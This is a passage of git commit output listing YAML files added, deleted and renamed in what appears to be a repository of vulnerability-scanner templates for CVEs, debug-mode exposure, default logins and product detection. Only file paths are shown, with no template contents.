poc/cve/cve-2000-0114-1297.yaml create mode 100644 poc/cve/cve-2002-1131-1304.yaml delete mode 100644 poc/cve/cve-2007-4504-1342.yaml create mode 100644 poc/cve/cve-2008-6222.yaml delete mode 100644 poc/cve/cve-2008-6668-1400.yaml create mode 100644 poc/cve/cve-2009-0545.yaml delete mode 100644 poc/cve/cve-2009-1496.yaml delete mode 100644 poc/cve/cve-2009-2015-1441.yaml delete mode 100644 poc/cve/cve-2009-2100-1446.yaml delete mode 100644 poc/cve/cve-2009-3053.yaml create mode 100644 poc/cve/cve-2010-0943.yaml delete mode 100644 poc/cve/cve-2010-0972-1522.yaml create 
mode 100644 poc/cve/cve-2010-0982.yaml delete mode 100644 poc/cve/cve-2010-1056.yaml delete mode 100644 poc/cve/cve-2010-1302-1567.yaml delete mode 100644 poc/cve/cve-2010-1305-1574.yaml delete mode 100644 poc/cve/cve-2010-1307-1585.yaml delete mode 100644 poc/cve/cve-2010-1308.yaml create mode 100644 poc/cve/cve-2010-1312-1598.yaml create mode 100644 poc/cve/cve-2010-1312.yaml create mode 100644 poc/cve/cve-2010-1313-1604.yaml delete mode 100644 poc/cve/cve-2010-1314.yaml create mode 100644 poc/cve/cve-2010-1315.yaml create mode 100644 poc/cve/cve-2010-1345-1621.yaml create mode 100644 poc/cve/cve-2010-1345.yaml delete mode 100644 poc/cve/cve-2010-1352.yaml delete mode 100644 poc/cve/cve-2010-1353-1630.yaml create mode 100644 poc/cve/cve-2010-1469.yaml create mode 100644 poc/cve/cve-2010-1470-1653.yaml delete mode 100644 poc/cve/cve-2010-1474.yaml delete mode 100644 poc/cve/cve-2010-1491.yaml create mode 100644 poc/cve/cve-2010-1494.yaml delete mode 100644 poc/cve/cve-2010-1532.yaml delete mode 100644 poc/cve/cve-2010-1540-1729.yaml delete mode 100644 poc/cve/cve-2010-1657-1761.yaml create mode 100644 poc/cve/cve-2010-1658-1765.yaml create mode 100644 poc/cve/cve-2010-1658.yaml delete mode 100644 poc/cve/cve-2010-1659-1773.yaml create mode 100644 poc/cve/cve-2010-1714-1779.yaml delete mode 100644 poc/cve/cve-2010-1715.yaml delete mode 100644 poc/cve/cve-2010-1717-1789.yaml delete mode 100644 poc/cve/cve-2010-1718.yaml delete mode 100644 poc/cve/cve-2010-1858.yaml create mode 100644 poc/cve/cve-2010-1953-1841.yaml create mode 100644 poc/cve/cve-2010-1981.yaml create mode 100644 poc/cve/cve-2010-1982.yaml create mode 100644 poc/cve/cve-2010-2682-1960.yaml delete mode 100644 poc/cve/cve-2010-2920.yaml create mode 100644 poc/cve/cve-2010-3203-1987.yaml create mode 100644 poc/cve/cve-2010-3203.yaml delete mode 100644 poc/cve/cve-2010-4239-1997.yaml delete mode 100644 poc/cve/cve-2010-4617.yaml create mode 100644 poc/cve/cve-2010-5028-2025.yaml create mode 100644 
poc/cve/cve-2010-5278-2030.yaml create mode 100644 poc/cve/cve-2010-5278.yaml delete mode 100644 poc/cve/cve-2011-2744.yaml delete mode 100644 poc/cve/cve-2011-3315-2059.yaml create mode 100644 poc/cve/cve-2011-4926.yaml delete mode 100644 poc/cve/cve-2011-5179.yaml delete mode 100644 poc/cve/cve-2012-0896-2132.yaml create mode 100644 poc/cve/cve-2012-0981.yaml create mode 100644 poc/cve/cve-2012-2371.yaml create mode 100644 poc/cve/cve-2012-4273-2198.yaml create mode 100644 poc/cve/cve-2012-4768-2207.yaml delete mode 100644 poc/cve/cve-2013-5528.yaml delete mode 100644 poc/cve/cve-2013-5979-2280.yaml create mode 100644 poc/cve/cve-2013-7240.yaml create mode 100644 poc/cve/cve-2014-2962-2313.yaml delete mode 100644 poc/cve/cve-2014-4561-2375.yaml delete mode 100644 poc/cve/cve-2014-4940.yaml create mode 100644 poc/cve/cve-2014-9094.yaml create mode 100644 poc/cve/cve-2014-9606-2430.yaml create mode 100644 poc/cve/cve-2014-9609-2437.yaml delete mode 100644 poc/cve/cve-2015-0554-2456.yaml delete mode 100644 poc/cve/cve-2015-1880-2477.yaml delete mode 100644 poc/cve/cve-2015-2166.yaml delete mode 100644 poc/cve/cve-2015-3306-2502.yaml delete mode 100644 poc/cve/cve-2015-4050.yaml create mode 100644 poc/cve/cve-2015-7780-2604.yaml delete mode 100644 poc/cve/cve-2016-1000128-2651.yaml delete mode 100644 poc/cve/cve-2016-1000132-2669.yaml delete mode 100644 poc/cve/cve-2016-1000134-2678.yaml delete mode 100644 poc/cve/cve-2016-1000143-2717.yaml create mode 100644 poc/cve/cve-2016-1000154-2740.yaml delete mode 100644 poc/cve/cve-2016-10940-2757.yaml delete mode 100644 poc/cve/cve-2016-6210.yaml delete mode 100644 poc/cve/cve-2016-7552-2812.yaml create mode 100644 poc/cve/cve-2017-12542-2884.yaml delete mode 100644 poc/cve/cve-2017-12615.yaml delete mode 100644 poc/cve/cve-2017-14535-2928.yaml delete mode 100644 poc/cve/cve-2017-15647-2955.yaml create mode 100644 poc/cve/cve-2017-15944-2965.yaml delete mode 100644 poc/cve/cve-2017-17451-2983.yaml delete mode 100644 
poc/cve/cve-2017-18536-2995.yaml delete mode 100644 poc/cve/cve-2017-3528-3012.yaml delete mode 100644 poc/cve/cve-2017-5487.yaml create mode 100644 poc/cve/cve-2017-5521-3027.yaml create mode 100644 poc/cve/cve-2017-5631-3031.yaml delete mode 100644 poc/cve/cve-2017-6090-3044.yaml delete mode 100644 poc/cve/cve-2017-7391.yaml create mode 100644 poc/cve/cve-2017-8917-3078.yaml create mode 100644 poc/cve/cve-2017-9805-3104.yaml create mode 100644 poc/cve/cve-2017-9822-3106.yaml create mode 100644 poc/cve/cve-2018-1000129.yaml delete mode 100644 poc/cve/cve-2018-1000226-3139.yaml delete mode 100644 poc/cve/cve-2018-10818-3171.yaml create mode 100644 poc/cve/cve-2018-11409.yaml delete mode 100644 poc/cve/cve-2018-14064-3301.yaml delete mode 100644 poc/cve/cve-2018-14728.yaml delete mode 100644 poc/cve/cve-2018-14912-3315.yaml delete mode 100644 poc/cve/cve-2018-15517-3331.yaml delete mode 100644 poc/cve/cve-2018-16133-3358.yaml create mode 100644 poc/cve/cve-2018-16167-3359.yaml create mode 100644 poc/cve/cve-2018-16288-3365.yaml delete mode 100644 poc/cve/cve-2018-17422-3421.yaml create mode 100644 poc/cve/cve-2018-17431-3423.yaml delete mode 100644 poc/cve/cve-2018-19386.yaml delete mode 100644 poc/cve/cve-2018-19752(1).yaml delete mode 100644 poc/cve/cve-2018-19877(1).yaml delete mode 100644 poc/cve/cve-2018-20010(1).yaml create mode 100644 poc/cve/cve-2018-20011(1).yaml delete mode 100644 poc/cve/cve-2018-20470-3497.yaml delete mode 100644 poc/cve/cve-2018-20985-3507.yaml delete mode 100644 poc/cve/cve-2018-3167.yaml delete mode 100644 poc/cve/cve-2018-5233-3567.yaml create mode 100644 poc/cve/cve-2018-6008-3574.yaml delete mode 100644 poc/cve/cve-2018-6200-3578.yaml create mode 100644 poc/cve/cve-2018-6910-3585.yaml delete mode 100644 poc/cve/cve-2018-7251-3587.yaml create mode 100644 poc/cve/cve-2018-7467-3598.yaml create mode 100644 poc/cve/cve-2018-7700-3618.yaml delete mode 100644 poc/cve/cve-2018-9118-3654.yaml create mode 100644 
"poc/cve/cve-2018\342\200\22314064(1).yaml" create mode 100644 poc/cve/cve-2019-1010287-3696.yaml create mode 100644 poc/cve/cve-2019-10692(1).yaml create mode 100644 poc/cve/cve-2019-11013-3719.yaml delete mode 100644 poc/cve/cve-2019-11248-3731.yaml delete mode 100644 poc/cve/cve-2019-11370(1).yaml create mode 100644 poc/cve/cve-2019-12962(1).yaml delete mode 100644 poc/cve/cve-2019-13101-3802.yaml create mode 100644 poc/cve/cve-2019-14251(1).yaml create mode 100644 poc/cve/cve-2019-15713-3887.yaml delete mode 100644 poc/cve/cve-2019-16097.yaml delete mode 100644 poc/cve/cve-2019-16123-3918.yaml create mode 100644 poc/cve/cve-2019-16278.yaml delete mode 100644 poc/cve/cve-2019-16931(1).yaml delete mode 100644 poc/cve/cve-2019-17418-3981.yaml create mode 100644 poc/cve/cve-2019-17558.yaml create mode 100644 poc/cve/cve-2019-18394.yaml create mode 100644 poc/cve/cve-2019-18665(1).yaml create mode 100644 poc/cve/cve-2019-18818-4021.yaml create mode 100644 poc/cve/cve-2019-19368.yaml delete mode 100644 poc/cve/cve-2019-19824-4053.yaml delete mode 100644 poc/cve/cve-2019-20210(1).yaml delete mode 100644 poc/cve/cve-2019-20224(1).yaml create mode 100644 poc/cve/cve-2019-20933(1).yaml delete mode 100644 poc/cve/cve-2019-2616(1).yaml delete mode 100644 poc/cve/cve-2019-2767-4117.yaml create mode 100644 poc/cve/cve-2019-6340(1).yaml create mode 100644 poc/cve/cve-2019-7238-4207.yaml create mode 100644 poc/cve/cve-2019-7609-4233.yaml delete mode 100644 poc/cve/cve-2019-8446-4252.yaml delete mode 100644 poc/cve/cve-2019-8903.yaml create mode 100644 poc/cve/cve-2019-8937-4278.yaml delete mode 100644 poc/cve/cve-2019-9082-4292.yaml create mode 100644 poc/cve/cve-2019-9915(1).yaml create mode 100644 poc/cve/cve-2020-10124(1).yaml delete mode 100644 poc/cve/cve-2020-10220.yaml delete mode 100644 poc/cve/cve-2020-11455-4397.yaml create mode 100644 poc/cve/cve-2020-11530.yaml create mode 100644 poc/cve/cve-2020-11738(1).yaml create mode 100644 poc/cve/cve-2020-11978(1).yaml 
create mode 100644 poc/cve/cve-2020-13117-4489.yaml create mode 100644 poc/cve/cve-2020-13121(1).yaml create mode 100644 poc/cve/cve-2020-13945-4535.yaml delete mode 100644 poc/cve/cve-2020-14181.yaml delete mode 100644 poc/cve/cve-2020-14408(1).yaml create mode 100644 poc/cve/cve-2020-14882.yaml delete mode 100644 poc/cve/cve-2020-19282-4706.yaml create mode 100644 poc/cve/cve-2020-19360-4714.yaml delete mode 100644 poc/cve/cve-2020-2036-4730.yaml delete mode 100644 poc/cve/cve-2020-20982-4740.yaml delete mode 100644 poc/cve/cve-2020-22211(1).yaml create mode 100644 poc/cve/cve-2020-22840.yaml create mode 100644 poc/cve/cve-2020-24223.yaml delete mode 100644 poc/cve/cve-2020-24391-4811.yaml delete mode 100644 poc/cve/cve-2020-25540.yaml delete mode 100644 poc/cve/cve-2020-27467-4950.yaml create mode 100644 poc/cve/cve-2020-28976-4989.yaml create mode 100644 poc/cve/cve-2020-29227-5000.yaml create mode 100644 poc/cve/cve-2020-29395.yaml create mode 100644 poc/cve/cve-2020-3452(1).yaml create mode 100644 poc/cve/cve-2020-35749-5075.yaml create mode 100644 poc/cve/cve-2020-36510(1).yaml delete mode 100644 poc/cve/cve-2020-6287.yaml delete mode 100644 poc/cve/cve-2020-7980(1).yaml create mode 100644 poc/cve/cve-2020-8194.yaml create mode 100644 poc/cve/cve-2020-8497-5317.yaml create mode 100644 poc/cve/cve-2020-8641-5330.yaml create mode 100644 poc/cve/cve-2020-8654(1).yaml create mode 100644 poc/cve/cve-2020-9043(1).yaml create mode 100644 poc/cve/cve-20200924a.yaml create mode 100644 poc/cve/cve-2021-20038-5443.yaml delete mode 100644 poc/cve/cve-2021-21287-5492.yaml create mode 100644 poc/cve/cve-2021-21745(1).yaml create mode 100644 poc/cve/cve-2021-21801-5531.yaml create mode 100644 poc/cve/cve-2021-21803-5536.yaml create mode 100644 poc/cve/cve-2021-22054(1).yaml create mode 100644 poc/cve/cve-2021-22145-5591.yaml delete mode 100644 poc/cve/cve-2021-22214-5601.yaml create mode 100644 poc/cve/cve-2021-22986-5612.yaml create mode 100644 
poc/cve/cve-2021-23241-5621.yaml delete mode 100644 poc/cve/cve-2021-24146-5631.yaml delete mode 100644 poc/cve/cve-2021-24236(1).yaml delete mode 100644 poc/cve/cve-2021-24275-5661.yaml delete mode 100644 poc/cve/cve-2021-24284(1).yaml delete mode 100644 poc/cve/cve-2021-24285-5673.yaml delete mode 100644 poc/cve/cve-2021-24286(1).yaml create mode 100644 poc/cve/cve-2021-24335-5703.yaml create mode 100644 poc/cve/cve-2021-24364-5721.yaml create mode 100644 poc/cve/cve-2021-24488(1).yaml delete mode 100644 poc/cve/cve-2021-24498-5751.yaml delete mode 100644 poc/cve/cve-2021-24838-5769.yaml delete mode 100644 poc/cve/cve-2021-25033(1).yaml delete mode 100644 poc/cve/cve-2021-25075(1).yaml create mode 100644 poc/cve/cve-2021-25085(1).yaml create mode 100644 poc/cve/cve-2021-25118(1).yaml create mode 100644 poc/cve/cve-2021-26085(1).yaml delete mode 100644 poc/cve/cve-2021-27519(1).yaml create mode 100644 poc/cve/cve-2021-27748(1).yaml delete mode 100644 poc/cve/cve-2021-28149-5943.yaml delete mode 100644 poc/cve/cve-2021-28150-5949.yaml create mode 100644 poc/cve/cve-2021-28377(1).yaml create mode 100644 poc/cve/cve-2021-28918-5975.yaml create mode 100644 poc/cve/cve-2021-29490-6011.yaml delete mode 100644 poc/cve/cve-2021-29622.yaml create mode 100644 poc/cve/cve-2021-30461.yaml delete mode 100644 poc/cve/cve-2021-31249-6068.yaml delete mode 100644 poc/cve/cve-2021-3129.yaml create mode 100644 poc/cve/cve-2021-31589-6095.yaml delete mode 100644 poc/cve/cve-2021-31682-6102.yaml delete mode 100644 poc/cve/cve-2021-31805(1).yaml delete mode 100644 poc/cve/cve-2021-3223(1).yaml create mode 100644 poc/cve/cve-2021-32305-6134.yaml create mode 100644 poc/cve/cve-2021-33544-6176.yaml create mode 100644 poc/cve/cve-2021-33807-6211.yaml create mode 100644 poc/cve/cve-2021-34370-6221.yaml delete mode 100644 poc/cve/cve-2021-34643-6238.yaml delete mode 100644 poc/cve/cve-2021-35265-6245.yaml create mode 100644 poc/cve/cve-2021-36356(1).yaml delete mode 100644 
poc/cve/cve-2021-37216-6280.yaml create mode 100644 poc/cve/cve-2021-37416(1).yaml create mode 100644 poc/cve/cve-2021-37580-6292.yaml create mode 100644 poc/cve/cve-2021-38702-6314.yaml delete mode 100644 poc/cve/cve-2021-38704-6317.yaml create mode 100644 poc/cve/cve-2021-38751-6320.yaml create mode 100644 poc/cve/cve-2021-39211(1).yaml create mode 100644 poc/cve/cve-2021-39226-6323.yaml delete mode 100644 poc/cve/cve-2021-39312(1).yaml delete mode 100644 poc/cve/cve-2021-41569(1).yaml delete mode 100644 poc/cve/cve-2021-41691-6460.yaml delete mode 100644 poc/cve/cve-2021-44103(1).yaml create mode 100644 poc/cve/cve-2021-44521-6556.yaml create mode 100644 poc/cve/cve-2021-44528(1).yaml create mode 100644 poc/cve/cve-2021-45428(1).yaml delete mode 100644 poc/cve/cve-2021-45968-6588.yaml delete mode 100644 poc/cve/cve-2021-46381-6597.yaml create mode 100644 poc/cve/cve-2021-46417(1).yaml create mode 100644 poc/cve/cve-2021-46422(1).yaml delete mode 100644 poc/cve/cve-2022-0208(1).yaml delete mode 100644 poc/cve/cve-2022-0543(1).yaml create mode 100644 poc/cve/cve-2022-0594(1).yaml create mode 100644 poc/cve/cve-2022-0599(1).yaml create mode 100644 poc/cve/cve-2022-0952(1).yaml delete mode 100644 poc/cve/cve-2022-0968(1).yaml delete mode 100644 poc/cve/cve-2022-1020(1).yaml delete mode 100644 poc/cve/cve-2022-1221(1).yaml create mode 100644 poc/cve/cve-2022-1392(1).yaml delete mode 100644 poc/cve/cve-2022-1597(1).yaml delete mode 100644 poc/cve/cve-2022-1713(1).yaml delete mode 100644 poc/cve/cve-2022-1815(1).yaml delete mode 100644 poc/cve/cve-2022-1904(1).yaml create mode 100644 poc/cve/cve-2022-1906(1).yaml delete mode 100644 poc/cve/cve-2022-1937(1).yaml delete mode 100644 poc/cve/cve-2022-21705(1).yaml create mode 100644 poc/cve/cve-2022-2187(1).yaml create mode 100644 poc/cve/cve-2022-22536-6662.yaml delete mode 100644 poc/cve/cve-2022-2290(1).yaml create mode 100644 poc/cve/cve-2022-22972(1).yaml delete mode 100644 poc/cve/cve-2022-24681(1).yaml create mode 
100644 poc/cve/cve-2022-2486(1).yaml delete mode 100644 poc/cve/cve-2022-2487(1).yaml delete mode 100644 poc/cve/cve-2022-24899(1).yaml delete mode 100644 poc/cve/cve-2022-25323-6724.yaml delete mode 100644 poc/cve/cve-2022-26134(1).yaml create mode 100644 poc/cve/cve-2022-26135(1).yaml delete mode 100644 poc/cve/cve-2022-26352(1).yaml delete mode 100644 poc/cve/cve-2022-26564(1).yaml create mode 100644 poc/cve/cve-2022-26960(1).yaml delete mode 100644 poc/cve/cve-2022-27927(1).yaml create mode 100644 poc/cve/cve-2022-28079(1).yaml delete mode 100644 poc/cve/cve-2022-28080(1).yaml delete mode 100644 poc/cve/cve-2022-29014(1).yaml delete mode 100644 poc/cve/cve-2022-29299(1).yaml create mode 100644 poc/cve/cve-2022-29548(1).yaml delete mode 100644 poc/cve/cve-2022-30073(1).yaml create mode 100644 poc/cve/cve-2022-30489(1).yaml delete mode 100644 poc/cve/cve-2022-30776(1).yaml create mode 100644 poc/cve/cve-2022-30777(1).yaml delete mode 100644 poc/cve/cve-2022-32007(1).yaml delete mode 100644 poc/cve/cve-2022-32025(1).yaml create mode 100644 poc/cve/cve-2022-32028(1).yaml create mode 100644 poc/cve/cve-2022-32409(1).yaml create mode 100644 poc/cve/cve-2022-33119(1).yaml create mode 100644 poc/cve/cve-2022-34046(1).yaml delete mode 100644 poc/cve/cve-2022-34047(1).yaml create mode 100644 poc/cve/cve-2022-34048(1).yaml create mode 100644 poc/cve/cve-2022-34049(1).yaml delete mode 100644 poc/cve/cve-2022-35416(1).yaml create mode 100644 poc/cve/cve-2024-23334.yaml delete mode 100644 poc/cve/resin-cnnvd-200705-315-9866.yaml create mode 100644 poc/cve/resin-cnnvd-200705-315-9867.yaml create mode 100644 poc/cve/springForShell-CVE-2022-22963.yaml create mode 100644 poc/debug/airflow-debug-231.yaml delete mode 100644 poc/debug/airflow-debug-233.yaml rename poc/debug/{android-debug-database-exposed-316.yaml => android-debug-database-exposed-314.yaml} (100%) create mode 100644 poc/debug/aspx-debug-mode-575.yaml delete mode 100644 poc/debug/aspx-debug-mode-578.yaml create mode 
100644 poc/debug/browserless-debugger-794.yaml delete mode 100644 poc/debug/browserless-debugger.yaml create mode 100644 poc/debug/coldfusion-debug-xss-1153.yaml delete mode 100644 poc/debug/coldfusion-debug-xss.yaml rename poc/debug/{debug-enabled-6788.yaml => debug-enabled-6789.yaml} (100%) create mode 100644 poc/debug/debug-enabled-6790.yaml create mode 100644 poc/debug/django-debug-exposed-404.yaml delete mode 100644 poc/debug/laravel-debug-enabled-8576.yaml delete mode 100644 poc/debug/laravel-debug-enabled.yaml create mode 100644 poc/debug/rails-debug-mode-9806.yaml delete mode 100644 poc/debug/rails-debug-mode-9807.yaml create mode 100644 poc/debug/symfony-debugmode-10620.yaml create mode 100644 poc/debug/wamp-xdebug-detect-11104.yaml rename poc/debug/{wordpress-debug-log-11258.yaml => wordpress-debug-log-11259.yaml} (100%) mode change 100755 => 100644 poc/debug/wp-debug-log.yaml create mode 100644 poc/default/Mantis-Default_login.yaml delete mode 100644 poc/default/Redmine-Default-Login.yaml delete mode 100644 poc/default/activemq-default-login-44.yaml create mode 100644 poc/default/activemq-default-login-48.yaml rename poc/default/{aem-default-get-servlet-137.yaml => aem-default-get-servlet-135.yaml} (100%) delete mode 100644 poc/default/aem-default-login-140.yaml delete mode 100644 poc/default/alphaweb-default-login.yaml delete mode 100644 poc/default/ambari-default-login-287.yaml create mode 100644 poc/default/ambari-default-login-289.yaml rename poc/default/{apollo-default-login-521.yaml => apollo-default-login.yaml} (100%) delete mode 100644 poc/default/arl-default-login-537.yaml rename poc/default/{azkaban-default-login-673.yaml => azkaban-default-login.yaml} (100%) create mode 100644 poc/default/canal-default-login-846.yaml delete mode 100644 poc/default/canal-default-login-849.yaml delete mode 100644 poc/default/chinaunicom-default-login-906.yaml rename poc/default/{cobbler-default-login-1119.yaml => cobbler-default-login-1118.yaml} (100%) delete 
mode 100644 poc/default/cobbler-default-login.yaml create mode 100644 poc/default/crushftp-default-login.yaml delete mode 100644 poc/default/default-apache-test-all.yaml delete mode 100644 poc/default/default-apache2-ubuntu-page.yaml delete mode 100644 poc/default/default-asp-net-page.yaml create mode 100644 poc/default/default-codeigniter-page-6833.yaml delete mode 100644 poc/default/default-detect-generic-6838.yaml create mode 100644 poc/default/default-detect-generic.yaml create mode 100644 poc/default/default-jetty-page-6862.yaml delete mode 100644 poc/default/default-lighttpd-page-6866.yaml create mode 100644 poc/default/default-lucee-page-6871.yaml create mode 100644 poc/default/default-nginx-page-6881.yaml create mode 100644 poc/default/default-openresty.yaml delete mode 100644 poc/default/default-payara-server-page-6894.yaml delete mode 100644 poc/default/default-plesk-page.yaml delete mode 100644 poc/default/default-redhat-test-page-6902.yaml rename poc/default/{dell-idrac-default-login-6943.yaml => dell-idrac-default-login.yaml} (100%) create mode 100644 poc/default/dolphinscheduler-default-login-7073.yaml rename poc/default/{dubbo-admin-default-login.yaml => dubbo-admin-default-login-7120.yaml} (100%) rename poc/default/{dvwa-default-login-7127.yaml => dvwa-default-login.yaml} (100%) delete mode 100644 poc/default/emcecom-default-login-7211.yaml create mode 100644 poc/default/emqx-default-login-7222.yaml rename poc/default/{exacqvision-default-login-7277.yaml => exacqvision-default-login.yaml} (100%) delete mode 100644 poc/default/flir-default-login-7514.yaml create mode 100644 poc/default/flir-default-login.yaml delete mode 100644 poc/default/frp-default-login-7556.yaml create mode 100644 poc/default/glpi-default-login.yaml create mode 100644 poc/default/guacamole-default-login-7859.yaml create mode 100644 poc/default/hongdian-default-login-7997.yaml delete mode 100644 poc/default/hongdian-default-login-7999.yaml delete mode 100644 
poc/default/huawei-HG532e-default-router-login.yaml delete mode 100644 poc/default/hue-default-credential-8081.yaml delete mode 100644 poc/default/hue-default-credential.yaml delete mode 100644 poc/default/idemia-biometrics-default-login-8139.yaml rename poc/default/{idemia-biometrics-default-login.yaml => idemia-biometrics-default-login-8141.yaml} (100%) delete mode 100644 poc/default/iptime-default-login-8193.yaml rename poc/default/{jenkins-default.yaml => jenkins-default-8272.yaml} (100%) create mode 100644 poc/default/jinher-oa-default-login-8312.yaml delete mode 100644 poc/default/jmx-default-login-8355.yaml create mode 100644 poc/default/jmx-default-login.yaml delete mode 100644 poc/default/jupyterhub-default-login-8400.yaml create mode 100644 poc/default/kafka-center-default-login.yaml create mode 100644 poc/default/lutron-iot-default-login-8675.yaml delete mode 100644 poc/default/lutron-iot-default-login-8678.yaml create mode 100644 poc/default/nagios-default-login-8990.yaml delete mode 100644 poc/default/nagios-default-login-8994.yaml delete mode 100644 poc/default/netsus-default-login-9060.yaml create mode 100644 poc/default/netsus-default-login.yaml delete mode 100644 poc/default/nps-default-login-9145.yaml delete mode 100644 poc/default/octobercms-default-login-9192.yaml create mode 100644 poc/default/octobercms-default-login.yaml delete mode 100644 poc/default/ofbiz-default-login-9210.yaml delete mode 100644 poc/default/openemr-default-login.yaml delete mode 100644 poc/default/operations-automation-default-page-9337.yaml rename poc/default/{operations-automation-default-page.yaml => operations-automation-default-page-9339.yaml} (100%) create mode 100644 poc/default/panabit-ixcache-default-login.yaml create mode 100644 poc/default/panos-default-login-9455.yaml create mode 100644 poc/default/panos-default-login.yaml delete mode 100644 poc/default/pentaho-default-login-9478.yaml create mode 100644 poc/default/pentaho-default-login-9480.yaml create mode 
100644 poc/default/rabbitmq-default-admin-9780.yaml delete mode 100644 poc/default/rabbitmq-default-admin-9782.yaml create mode 100644 poc/default/rainloop-default-login.yaml create mode 100644 poc/default/ranger-default-login-9827.yaml create mode 100644 poc/default/rockmongo-default-login-9897.yaml create mode 100644 poc/default/samsung-wlan-default-login-10018.yaml create mode 100644 poc/default/supermicro-default-login.yaml rename poc/default/{szhe-default-login.yaml => szhe-default-login-10638.yaml} (100%) create mode 100644 poc/default/telecom-gateway-default-login.yaml create mode 100644 poc/default/tomcat-default-login.yaml delete mode 100644 poc/default/trilithic-viewpoint-default-10835.yaml create mode 100644 poc/default/ucmdb-default-login-10871.yaml rename poc/default/{ucmdb-default-login-10869.yaml => ucmdb-default-login.yaml} (100%) delete mode 100644 poc/default/vidyo-default-login-11009.yaml rename poc/default/{vidyo-default-login.yaml => vidyo-default-login-11010.yaml} (100%) create mode 100644 poc/default/visionhub-default-login-11026.yaml delete mode 100644 poc/default/wifisky-default-password-11205.yaml delete mode 100644 poc/default/wso2-default-login.yaml delete mode 100644 poc/default/xampp-default-page-11661.yaml rename poc/default/{xampp-default-page.yaml => xampp-default-page-11662.yaml} (100%) create mode 100644 poc/default/xerox7-default-login.yaml delete mode 100644 poc/default/xxljob-default-login-11709.yaml create mode 100644 poc/detect/RedMine-Detect.yaml rename poc/detect/{acontent-detect-32.yaml => acontent-detect.yaml} (100%) rename poc/detect/{addeventlistener-detect-66.yaml => addeventlistener-detect-64.yaml} (100%) delete mode 100644 poc/detect/adobe-coldfusion-detect-82.yaml create mode 100644 poc/detect/adobe-coldfusion-error-detect-86.yaml rename poc/detect/{adobe-coldfusion-error-detect-88.yaml => adobe-coldfusion-error-detect.yaml} (100%) delete mode 100644 poc/detect/airflow-detect-239.yaml create mode 100644 
poc/detect/airflow-detect-240.yaml delete mode 100644 poc/detect/alfresco-detect-259.yaml create mode 100644 poc/detect/alfresco-detect-260.yaml create mode 100644 poc/detect/apache-answer-detect.yaml create mode 100644 poc/detect/apache-axis-detect-339.yaml rename poc/detect/{apache-axis-detect.yaml => apache-axis-detect-341.yaml} (100%) delete mode 100644 poc/detect/apache-cocoon-detect-342.yaml create mode 100644 poc/detect/apache-cocoon-detect.yaml rename poc/detect/{apache-detect.yaml => apache-detect-346.yaml} (100%) create mode 100644 poc/detect/apollo-server-detect-523.yaml rename poc/detect/{apollo-server-detect-522.yaml => apollo-server-detect.yaml} (100%) delete mode 100644 poc/detect/artica-web-proxy-detect-545.yaml rename poc/detect/{artica-web-proxy-detect-543.yaml => artica-web-proxy-detect.yaml} (100%) create mode 100644 poc/detect/autobahn-python-detect-594.yaml delete mode 100644 poc/detect/autobahn-python-detect-595.yaml delete mode 100644 poc/detect/avantfax-detect-600.yaml delete mode 100644 poc/detect/aws-elastic-beanstalk-detect.yaml rename poc/detect/{basic-auth-detection-687.yaml => basic-auth-detection-689.yaml} (100%) delete mode 100644 poc/detect/bigbluebutton-detect-723.yaml create mode 100644 poc/detect/bigbluebutton-detect.yaml create mode 100644 poc/detect/bigip-config-utility-detect-730.yaml create mode 100644 poc/detect/bigip-config-utility-detect-732.yaml create mode 100644 poc/detect/burp-api-detect-810.yaml delete mode 100644 poc/detect/burp-api-detect-812.yaml delete mode 100644 poc/detect/cacti-detect-826.yaml delete mode 100644 poc/detect/carestream-vue-detect-861.yaml delete mode 100644 poc/detect/centreon-detect-877.yaml delete mode 100644 poc/detect/citrix-adc-gateway-detect-981.yaml create mode 100644 poc/detect/citrix-adc-gateway-detect-983.yaml delete mode 100644 poc/detect/citrix-vpn-detect-987.yaml delete mode 100644 poc/detect/cname-service-detector-1034.yaml rename poc/detect/{cockpit-detect-1127.yaml => 
cockpit-detect-1126.yaml} (100%) delete mode 100644 poc/detect/confluence-detect-1187.yaml create mode 100644 poc/detect/confluence-detect-1189.yaml delete mode 100644 poc/detect/craft-cms-detect.yaml create mode 100644 poc/detect/crush-ftp-detect-1272.yaml rename poc/detect/{csrfguard-detect-1290.yaml => csrfguard-detect.yaml} (100%) create mode 100644 poc/detect/custom-data-result-service-detect.yaml delete mode 100644 poc/detect/default-detect-generic-6838.yaml create mode 100644 poc/detect/default-detect-generic.yaml create mode 100644 poc/detect/dell-idrac7-detect.yaml create mode 100644 poc/detect/dell-idrac9-detect-6937.yaml create mode 100644 poc/detect/detect-dangling-cname-6967.yaml create mode 100644 poc/detect/detect-drone-config-6973.yaml rename poc/detect/{detect-options-method-6978.yaml => detect-options-method-6977.yaml} (100%) create mode 100644 poc/detect/dns-waf-detect-7052.yaml delete mode 100644 poc/detect/druid-detect-7098.yaml create mode 100644 poc/detect/dwr-index-detect-7135.yaml create mode 100644 poc/detect/dwr-index-detect.yaml delete mode 100644 poc/detect/ec2-detection-7162.yaml create mode 100644 poc/detect/ec2-detection-7163.yaml create mode 100644 poc/detect/eg-manager-detect.yaml create mode 100644 poc/detect/elasticsearch-sql-client-detect-7190.yaml create mode 100644 poc/detect/epson-access-detect-7235.yaml create mode 100644 poc/detect/fanruanoa-detect-7392.yaml create mode 100644 poc/detect/fanruanoa2012-detect-7388.yaml delete mode 100644 poc/detect/fanruanoa2012-detect.yaml delete mode 100644 poc/detect/favicon-detection-7441.yaml create mode 100644 poc/detect/froxlor-detect-7553.yaml create mode 100644 poc/detect/gespage-detect-7603.yaml create mode 100644 poc/detect/github-enterprise-detect-7649.yaml delete mode 100644 poc/detect/grafana-detect-7808.yaml create mode 100644 poc/detect/graphql-detect-7830.yaml delete mode 100644 poc/detect/graphql-detect-7831.yaml delete mode 100644 poc/detect/grav-cms-detect.yaml delete 
